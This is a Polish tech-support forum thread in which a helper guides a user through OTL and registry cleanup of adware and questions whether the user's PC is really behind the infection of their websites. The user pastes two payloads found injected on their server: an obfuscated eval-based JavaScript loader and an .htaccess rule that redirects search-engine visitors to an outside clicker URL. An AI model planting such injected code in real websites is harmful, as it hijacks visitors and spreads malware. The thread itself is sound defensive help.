Skocz do zawartości

Infekcja trojan js


Rekomendowane odpowiedzi

Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.
zainfekowany komputer trojanem jakims ktory wbija sie na serwery FTP zmieniajac kod plikow i blokujac strony avast wykrywa js:iframe-xj[trj]

 

W raporcie nie ma oznak czynnej infekcji, jest tylko odpadek po "policji" + adware, ale to nie ma związku. Skąd pewność, że to ten komputer jest źródłem? Skąd pewność że wina nie leży po stronie serwerowej (luki w oprogramowaniu)? Jakie oprogramowanie jest zainstalowane na serwerze? Czy po pierwszej infekcji zmieniałeś wszystkie hasła FTP?

 

 

Na teraz:

 

1. Od razu skoryguj sprawę z oprogramowaniem zabezpieczającym, bo jest tu katastrofa. Działają wspólnie Avast + ESET Smart Security. Jeden z nich do deinstalacji. Od razu pozbądź się też mało skutecznego Spybota oraz adware AVG Security Toolbar.

 

2. Uruchom OTL i w sekcji Własne opcje skanowania / skrypt wklej:

 

:OTL
IE - HKLM\..\SearchScopes\{006ee092-9658-4fd6-bd8e-a21a348e59f5}: "URL" = "http://feed.helperbar.com/?publisher=OPENCANDY&dpid=OPENCANDYAPRIL&co=PL&userid=423e462a-6da8-46bc-90b1-a69156bf68f7&affid=110774&searchtype=ds&babsrc=lnkry&q={searchTerms}"
IE - HKU\S-1-5-21-3325182840-2650996301-1092758413-1000\..\SearchScopes\{006ee092-9658-4fd6-bd8e-a21a348e59f5}: "URL" = "http://feed.helperbar.com/?publisher=OPENCANDY&dpid=OPENCANDYAPRIL&co=PL&userid=423e462a-6da8-46bc-90b1-a69156bf68f7&affid=110774&searchtype=ds&babsrc=lnkry&q={searchTerms}"
IE - HKU\S-1-5-21-3325182840-2650996301-1092758413-1000\..\SearchScopes\{0388404D-6072-4CEB-B521-8F090FEAEE57}: "URL" = "http://klit.startnow.com/s/?q={searchTerms}&src=defsearch&provider=&provider_name=yahoo&provider_code=&partner_id=693&product_id=741&affiliate_id=&channel=&toolbar_id=200&toolbar_version=2.4.0&install_country=PL&install_date=20120209&user_guid=C420D2DB3DB44AD09EBEF4341913CFD5&machine_id=4cd5afaf5eb4e21c9043edc37f6611d7&browser=IE&os=win&os_version=6.1-x64-SP1&iesrc={referrer:source}"
IE - HKU\S-1-5-21-3325182840-2650996301-1092758413-1000\..\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}: "URL" = "https://isearch.avg.com/search?cid={6876415B-4691-45BD-9C85-1133EA3B184C}&mid=8f37b150372f47d09183d1569643f354-07f3780bbd7966a981fa68fa32d4b562adedc4e6&lang=pl&ds=xn011&pr=sa&d=2012-09-18 00:11:54&v=12.2.5.34&sap=dsp&q={searchTerms}"
O2:64bit: - BHO: (TinyBHO Class) - {00e71626-0bef-11dc-8314-0864264c9a64} - C:\Users\Michał\AppData\Roaming\DownloaderGold\ieplug.dll ()
O2 - BHO: (TinyBHO Class) - {00e71626-0bef-11dc-8314-0800200c9a66} - C:\Users\Michał\AppData\Roaming\DownloaderGold\ieplug.dll ()
 
:Reg
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Search Bar"=-
"Search Page"=-
"Start Page"="about:blank"
[-HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search]
 
:Files
C:\ProgramData\dsgsdgdsgdsgw.pad
C:\ProgramData\dsgsdgdsgdsgw.js
C:\Users\Michał\AppData\Roaming\DownloaderGold
C:\Users\Michał\AppData\Roaming\OpenCandy
netsh advfirewall reset /C
 
:Commands
[emptytemp]

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Klik w Wykonaj skrypt. Zatwierź restart systemu.

 

3. Uruchom AdwCleaner i zastosuj Usuń. Na dysku C powstanie log z usuwania.

 

4. Zrób nowy log OTL z opcji Skanuj (już bez Extras). Dołącz log utworzony przez AdwCleaner.

 

 

 

.

Odnośnik do komentarza

Problem o ktorym pisze to js:iframe-xj[trj]

do serwera FTP dostał sie trojan z mojego komputera, dodaje on do plikow index. httecss oraz .js rozne kody np.

 

/*336988*/
																																																																																																															  try{window.document.body++}catch(gdsgsdg){dbshre=152;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,98,93,24,54,26,95,102,91,110,103,96,101,108,39,93,109,92,89,109,95,64,99,93,102,95,105,107,32,32,99,97,105,89,102,95,34,32,51,6,4,8,1,24,25,26,27,94,94,39,109,109,90,24,54,26,34,95,108,109,106,53,38,39,92,105,106,103,101,90,110,109,96,112,39,99,111,38,91,101,99,94,98,93,107,40,107,95,104,32,53,8,1,24,25,26,27,94,94,39,109,111,112,100,94,40,107,102,107,98,110,100,102,102,25,55,27,30,89,91,109,106,99,109,109,95,34,50,5,3,26,27,23,24,96,96,41,106,108,114,102,96,37,90,104,108,95,92,106,25,55,27,30,40,32,53,8,1,24,25,26,27,94,94,39,109,111,112,100,94,40,99,92,97,96,98,111,23,53,25,33,44,103,112,32,53,8,1,24,25,26,27,94,94,39,109,111,112,100,94,40,114,96,92,109,98,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,98,93,38,108,110,116,99,93,39,102,96,93,108,25,55,27,30,41,105,114,34,50,5,3,26,27,23,24,96,96,41,106,108,114,102,96,37,108,104,106,27,52,24,32,43,107,111,31,52,7,5,4,2,25,26,27,23,97,95,26,35,24,92,10 4,93,112,100,93,103,110,41,94,93,109,63,103,92,101,94,104,111,57,113,66,94,35,30,95,95,33,36,32,24,116,7,5,23,24,25,26,27,23,24,25,94,106,90,109,102,95,105,107,38,112,108,100,107,93,33,33,55,91,97,111,26,100,91,53,85,33,98,93,84,32,56,55,38,92,98,112,57,30,33,52,7,5,23,24,25,26,27,23,24,25,94,106,90,109,102,95,105,107,38,96,95,111,60,100,94,103,96,101,108,59,115,68,91,32,32,97,97,30,33,39,91,107,103,93,103,94,62,95,97,101,94,35,94,94,34,53,8,1,24,25,26,27,116,5,3,119,36,31,33,52);s="";for(i=0;i-458!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}
/*/336988*/

 

albo

 

#336988#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|p ocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://coopmatrix.it/clicker.php [R=301,L]
</IfModule>
#/336988#

 

strony przestają działać

zmieniłem juz hasło na ftp, i dalem chmode na pliki 444

z tego co wyczytałem to wirus ktory wyciaga hasal z np. Total Commander i sam sobie wchodzi i to robi, no ale gdzies on na tym komputerze musi być ulokowany jakoś trzeba go wywalić?

zobaczymy czy to wroci

OTL.Txt

AdwCleanerS2.txt

Odnośnik do komentarza

Jak mówię ja w Twoim raporcie nie widzę takiej infekcji, a skanerów też użyłeś sporo. Czyż nie należy założyć, że system tu oglądany jest jednak czysty? Pytam: skąd wiadomo, że Twój komputer jest źródłem infekcji stron? Ten rodzaj infekcji może mieć równie dobrze źródło po stronie serwerowej. Nie odpowiedziałeś mi na pytanie: jakie oprogramowanie jest zainstalowane na serwerze, w jakiej wersji, w jakim stopniu załatania.

 

 


Co do reszty, to zadania wykonane i tylko drobne poprawki:

 

1. Korekta domyślnych wyszukiwarek IE po użyciu AdwCleaner. Otwórz Notatnik i wklej w nim:

 

Windows Registry Editor Version 5.00
 
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
 
[-HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes]
 
[-HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes]
 
[-HKEY_USERS\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes]
 
[-HKEY_USERS\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"ROC_ROC_NT"=-

 

Z menu Notatnika > Plik > Zapisz jako > Ustaw rozszerzenie na Wszystkie pliki > Zapisz jako FIX.REG

 

Kliknij prawym na plik i z menu wybierz opcję Scal. Potwierdź import do rejestru.

 

2. Porządki po narzędziach: w AdwCleaner uruchom Odinstaluj, w OTL uruchom Sprzątanie, przez SHIFT+DEL dokasuj poniższe foldery.

 

C:\ProgramData\Spybot - Search & Destroy

C:\Program Files (x86)\Spybot - Search & Destroy 2

C:\Users\Michał\AppData\Roaming\ESET

 

3. Napraw błąd WMI zgłaszany w Dzienniku zdarzeń: KB2545227.

 

4. Wyczyść foldery Przywracania systemu: KLIK.

 

5. Odinstaluj stare Adobe i Java, zaktualizuj Operę i produkty Mozilla, sprawdź wersję Google Chrome: KLIK. Wg raportu obecnie posiadasz wersje:

 

========== HKEY_LOCAL_MACHINE Uninstall List ==========

 

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]

"{26A24AE4-039D-4CA4-87B4-2F86417005FF}" = Java™ 7 Update 5 (64-bit)

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]

"{26A24AE4-039D-4CA4-87B4-2F83216031FF}" = Java™ 6 Update 31

"{26A24AE4-039D-4CA4-87B4-2F83217009FF}" = Java 7 Update 9

"{AC76BA86-7AD7-1045-7B44-A95000000001}" = Adobe Reader 9.5.0 - Polish

"Google Chrome" = Google Chrome

"Mozilla Firefox 17.0.1 (x86 pl)" = Mozilla Firefox 17.0.1 (x86 pl)

"Mozilla Thunderbird 17.0.2 (x86 pl)" = Mozilla Thunderbird 17.0.2 (x86 pl)

"Opera 11.61.1250" = Opera 11.61

 

 

.

Edytowane przez picasso
18.02.2013 - Temat zostaje zamknięty z powodu braku odpowiedzi. //picasso
Odnośnik do komentarza
Gość
Ten temat został zamknięty. Brak możliwości dodania odpowiedzi.
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...